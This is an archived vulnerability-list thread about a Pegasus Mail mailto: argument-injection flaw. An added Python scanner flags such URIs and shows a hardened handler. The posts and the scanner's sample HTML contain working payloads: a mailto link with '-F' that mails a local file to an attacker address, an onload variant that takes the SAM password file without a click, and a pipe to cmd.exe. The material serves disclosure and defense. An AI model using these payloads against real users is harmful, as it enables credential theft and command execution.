Vulnerability Development mailing list archives
Re: Pegasus Mail
From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Mon, 2 Oct 2000 22:44:35 -0500
Imran Ghory wrote:
When using the following HTML, <a href="mailto:hacker () hakersite com -F c:\test.txt"> Click here</a>, when the user clicks on "Click here" Pegasus Mail will automatically create a message which has a copy of the file "c:\test.txt" and is addressed to "hacker () hakersite com", and queues it ready to be sent without any further user intervention. If instead of "hacker () hakersite com" we have a local user, "hacker", the message won't be queued but just sent immediately. As in order to have files stolen the user would have to click on the dubious-looking link, is this security risk serious?
YES, the user doesn't even need to click on the link though. Imagine a page like: <body onload="mailto:hacker () hakersite com -F c:\winnt\repair\sam._"> There goes your user account/hash database. Have you tested to see what pipes do? Example: <body onload="mailto:hacker () hakersite com -F c:\winnt\repair\sam._ | cmd.exe /c echo I can any command I want">
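The pattern the thread describes is argument injection: whatever follows the address in a mailto: URI is handed to the mail client's command line, so a `-F <file>` switch (or a pipe) rides along with the address. The scanner below is an added example, not code from the original posters or from Pegasus Mail; the sample HTML, the example.com addresses and the finding codes are constructed for illustration. It collects every attribute whose value is a mailto: URI (hrefs and event handlers alike), percent-decodes it before checking so `%20` cannot hide a space, and flags extra whitespace-separated tokens, switch-like tokens and shell metacharacters. `accept_address` shows the handler-side fix: only a bare, allowlisted addr-spec is passed on, everything else is refused.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample page (not from the original thread); addresses are
# placeholders in example.com. The onload case mirrors the "no click needed"
# variant, the pipe case the "what do pipes do" question.
SAMPLE_HTML = r"""
<html>
<body onload="mailto:hacker@example.com -F c:\winnt\repair\sam._">
<a href="mailto:alice@example.com?subject=hi">benign</a>
<a href="mailto:hacker@example.com -F c:\test.txt">Click here</a>
<a href="mailto:hacker@example.com -F c:\test.txt | cmd.exe /c echo owned">pipe</a>
<a href="mailto:hacker@example.com%20-F%20c:\test.txt">encoded</a>
</body>
</html>
"""

# Deliberately strict allowlist for an addr-spec; not a full RFC 5322 grammar.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
SHELL_META = set("|&;`$<>")


class MailtoCollector(HTMLParser):
    """Collect every attribute value that starts with mailto:, whatever the tag or attribute."""

    def __init__(self):
        super().__init__()
        self.mailtos = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and value.strip().lower().startswith("mailto:"):
                self.mailtos.append((tag, name, value.strip()))


def analyze_mailto(uri):
    """Return a list of finding codes for a mailto: URI; an empty list means it looks clean."""
    if not uri.lower().startswith("mailto:"):
        raise ValueError("not a mailto: URI")
    # Decode before inspecting: a percent-encoded space is still a space on the command line.
    target = unquote(uri[len("mailto:"):])
    # Header fields (subject=..., body=...) are not part of the address and are not passed on.
    addr_part = target.split("?", 1)[0]
    tokens = addr_part.split()
    findings = []
    if not tokens:
        return ["empty"]
    if len(tokens) > 1:
        findings.append("extra-args")        # anything after the address would become argv
    if any(t.startswith(("-", "/")) for t in tokens[1:]):
        findings.append("switch")            # e.g. -F <file> or /c
    if any(c in SHELL_META for c in addr_part):
        findings.append("shell-meta")        # pipes and friends
    if not ADDRESS_RE.match(tokens[0]):
        findings.append("bad-address")
    return findings


def scan_html(html):
    """Return [(uri, findings), ...] for every mailto: URI in the page, in document order."""
    collector = MailtoCollector()
    collector.feed(html)
    return [(uri, analyze_mailto(uri)) for _, _, uri in collector.mailtos]


def accept_address(uri):
    """Hardened handler entry point: hand back the bare address only if nothing rides along with it."""
    if analyze_mailto(uri):
        return None
    return unquote(uri[len("mailto:"):]).split("?", 1)[0]


if __name__ == "__main__":
    for uri, findings in scan_html(SAMPLE_HTML):
        status = "ok" if not findings else ",".join(findings)
        print(f"{status:28} {uri}")
```

The handler-side rule is the important part: a mail client registered as the mailto: protocol handler should treat the URI as data, extract one address with an allowlist, and never splice the raw string into a command line. The same check applies to any other URI scheme whose handler is launched by the browser with the URI as an argument.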
Current thread:
- Pegasus Mail Imran Ghory (Oct 02)
- Re: Pegasus Mail Peter Pentchev (Oct 03)
- Re: Pegasus Mail Helmut Springer (Oct 03)
- Re: Pegasus Mail H D Moore (Oct 03)
- Re: Pegasus Mail Knud Erik Hojgaard - CyberCity Support (Oct 03)
- Re: Pegasus Mail Bernie Cosell (Oct 03)
- <Possible follow-ups>
- Re: Pegasus Mail Brad Griffin (Oct 03)